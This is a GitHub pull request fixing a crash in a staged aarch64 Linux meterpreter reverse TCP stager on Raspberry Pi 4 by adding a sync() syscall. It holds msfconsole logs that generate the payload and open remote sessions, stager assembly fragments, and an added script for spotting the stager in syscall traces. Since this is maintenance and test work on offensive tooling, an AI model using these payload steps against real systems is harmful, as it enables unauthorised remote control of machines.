
Fix SIGILL on staged meterpreter on RaspberryPi4 #19875

Open. Wants to merge 4 commits into base: master

Conversation

Contributor
@dledda-r7 commented Feb 12, 2025

This PR fixes: this issue

ISSUE

Inside the read_loop the read syscall gets the data from the socket file descriptor and writes it to the new memory.
When we execute the payload with ./metsrv we get a SIGILL at the start of MMAP; if we run the program using strace, the program works flawlessly.
The issue was identified by @h00die-gr3y on this PR

FIX

The fix is simply adding a sync() syscall after each read() to enforce cache flushing (?). I still have no idea why it works, but it does.
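The thread notes that running the stager under strace hides the SIGILL, but the syscall sequence the description gives (a socket, a fresh executable mapping, read() on the socket filling it, and now a sync() after every read) is still visible in such a trace. As a defender-side illustration, here is an added example, not code from this PR or from Metasploit, that walks strace-style lines and flags that sequence. The trace lines are constructed (the stage size 953388 and the handler address come from the session logs in this thread; the mapping address and the names STAGER_TRACE, BENIGN_TRACE, Report and analyse_trace are my own), and the regex assumes strace's default output format.

```python
"""Heuristic review of a syscall trace for the 'read a stage into executable
memory' pattern described in the PR. Added example, not part of the PR."""
import re
from dataclasses import dataclass, field
from typing import List, Set

# Constructed strace-style lines (not a real capture): a socket is opened, an
# anonymous RWX mapping is created, and read() on the socket fills it, with a
# sync() after each read as in this PR's fix.
STAGER_TRACE = r"""
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("10.5.135.201")}, 16) = 0
mmap(NULL, 953388, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9a2c000000
read(3, "\x7fELF\x02\x01\x01"..., 953388) = 65536
sync() = 0
read(3, "\x00\x00\x00\x00"..., 887852) = 887852
sync() = 0
"""

# Constructed benign trace: an ordinary file read and a non-executable mapping.
BENIGN_TRACE = r"""
openat(AT_FDCWD, "/etc/hosts", O_RDONLY|O_CLOEXEC) = 3
read(3, "127.0.0.1\tlocalhost\n", 4096) = 20
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f0000000000
"""

# name(args) = retval, with an optional "[pid N]" prefix as strace -f prints it
SYSCALL_RE = re.compile(r'^(?:\[pid\s+\d+\]\s+)?(\w+)\((.*)\)\s+=\s+(-?\w+)')


@dataclass
class Report:
    exec_map_bytes: List[int] = field(default_factory=list)  # sizes of anonymous RWX mappings
    socket_bytes: int = 0              # bytes read from sockets once such a mapping exists
    syncs_after_socket_reads: int = 0  # sync() calls that directly follow a socket read
    staged_code_loaded: bool = False   # socket reads reached the size of the RWX mapping
    findings: List[str] = field(default_factory=list)


def analyse_trace(trace: str) -> Report:
    rep = Report()
    socket_fds: Set[int] = set()
    last_was_socket_read = False
    for line in trace.splitlines():
        m = SYSCALL_RE.match(line.strip())
        if not m:
            continue
        name, args, ret = m.groups()
        was_socket_read = False
        if name == 'socket' and not ret.startswith('-'):
            socket_fds.add(int(ret))
        elif name == 'mmap':
            a = [x.strip() for x in args.split(',')]   # mmap args contain no nested commas
            size, prot, flags = int(a[1]), a[2], a[3]
            if 'PROT_EXEC' in prot and 'PROT_WRITE' in prot and 'MAP_ANONYMOUS' in flags:
                rep.exec_map_bytes.append(size)
                rep.findings.append(f'anonymous RWX mapping of {size} bytes at {ret}')
        elif name == 'read':
            fd = int(args.split(',', 1)[0])
            n = int(ret)
            if fd in socket_fds and rep.exec_map_bytes and n > 0:
                rep.socket_bytes += n
                was_socket_read = True
                if not rep.staged_code_loaded and rep.socket_bytes >= max(rep.exec_map_bytes):
                    rep.staged_code_loaded = True
                    rep.findings.append(f'socket reads reached {rep.socket_bytes} bytes, '
                                        f'enough to fill the RWX mapping')
        elif name == 'sync' and last_was_socket_read:
            rep.syncs_after_socket_reads += 1
        last_was_socket_read = was_socket_read
    if rep.syncs_after_socket_reads:
        rep.findings.append(f'{rep.syncs_after_socket_reads} sync() calls directly after socket reads')
    return rep


if __name__ == '__main__':
    for label, trace in (('stager', STAGER_TRACE), ('benign', BENIGN_TRACE)):
        rep = analyse_trace(trace)
        print(f'{label}: loaded={rep.staged_code_loaded}; ' + '; '.join(rep.findings))
```

strace does not print the destination buffer of read(), so the script correlates by file descriptor and byte count rather than by address: it treats socket reads that add up to the size of an earlier anonymous RWX mapping as the stage being loaded, and separately counts the sync() calls this PR inserts, which a trace of the unpatched stager would not show.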

@bwatters-r7 added the rn-fix (release notes fix) label Feb 12, 2025
Contributor
@bwatters-r7

msf6 payload(cmd/linux/https/x64/meterpreter_reverse_tcp) > use payload/linux/aarch64/meterpreter/reverse_tcp 
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > generate -f elf -o revtcp_aarch64_4444.staged
[*] Writing 348 bytes to revtcp_aarch64_4444.staged...
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (953388 bytes) to 10.5.134.142
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.142:51044) at 2025-02-12 15:06:25 -0600
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.134.142
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > 

Contributor
@bwatters-r7

Yeah; I'm not thrilled with this, but it does work. This bug has only been seen on RPi4B, and to the best of my knowledge, the read() syscall should not be asynchronous... but when we run it, the data we expect is not there when we jump into the buffer. To my knowledge, we don't have to do this with any other payload stager.
The ubiquity of RPis is enough that adding these 16 extra bytes to support it makes sense, but I don't doubt that in 5 years, someone's going to git blame, then come back here and wonder what the heck we were thinking, because we really should not need that sync(). If that's you, hello from the past! 👋
In this case, sync() fixes the behavior, but it may be as useful as any other syscall that causes a brief pause in execution that allows the data to populate properly.
Unfortunately, attaching any kind of debugger or forensic tool slows execution enough that we cannot see the bug in action, so we're really just kinda making our best guess.

Comment on lines 80 to 83
mov x2, x0
mov x8, #0x51
svc 0
mov x0, x2
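Review bot: the four lines around `mov x8, #0x51` / `svc 0` carry no comment saying why an extra syscall now sits after read(), which is exactly what the thread expects a future `git blame` reader to trip over; suggest a comment on `mov x8, #0x51` recording that 0x51 (81) is the arm64 `sync` syscall number, that it is a workaround for the RPi4 SIGILL in the linked issue, and that the `mov x2, x0` / `mov x0, x2` pair only preserves x0 across the call, since sync takes no arguments and the kernel overwrites x0 with its return value. The comment should not describe it as a cache flush: sync() commits filesystem buffers and does no CPU cache maintenance, so it is better documented as the empirically needed pause the discussion above describes.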
Contributor Author

Add comment linking the issue

Contributor
@bwatters-r7 commented Feb 13, 2025

This is not required on Raspi5:

msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > show options

Module options (payload/linux/aarch64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > generate -f elf -o revtcp_aarch64_4444.elf
[*] Writing 332 bytes to revtcp_aarch64_4444.elf...
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (953388 bytes) to 10.5.132.181
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.181:53530) at 2025-02-13 13:40:25 -0600

msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.132.181
OS           : Debian  (Linux 6.6.63-v8+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: kali
meterpreter > 
┌──(kali㉿kali-raspberrypi)-[~]
└─$ cat /proc/cpuinfo
processor       : 0
BogoMIPS        : 108.00
Features        : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp cpuid asimdrdm lrcpc dcpop asimddp
CPU implementer : 0x41
CPU architecture: 8
CPU variant     : 0x4
CPU part        : 0xd0b
CPU revision    : 1

processor       : 1
BogoMIPS        : 108.00
Features        : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp cpuid asimdrdm lrcpc dcpop asimddp
CPU implementer : 0x41
CPU architecture: 8
CPU variant     : 0x4
CPU part        : 0xd0b
CPU revision    : 1

processor       : 2
BogoMIPS        : 108.00
Features        : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp cpuid asimdrdm lrcpc dcpop asimddp
CPU implementer : 0x41
CPU architecture: 8
CPU variant     : 0x4
CPU part        : 0xd0b
CPU revision    : 1

processor       : 3
BogoMIPS        : 108.00
Features        : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp cpuid asimdrdm lrcpc dcpop asimddp
CPU implementer : 0x41
CPU architecture: 8
CPU variant     : 0x4
CPU part        : 0xd0b
CPU revision    : 1

Revision        : c04170
Serial          : 5d9ccc98ed7bf5d3
Model           : Raspberry Pi 5 Model B Rev 1.0

Labels: arm (arm payload), rn-fix (release notes fix)
Projects: Status: Todo
Development: successfully merging this pull request may close this issue: Staged AARCH64 Illegal instruction
2 participants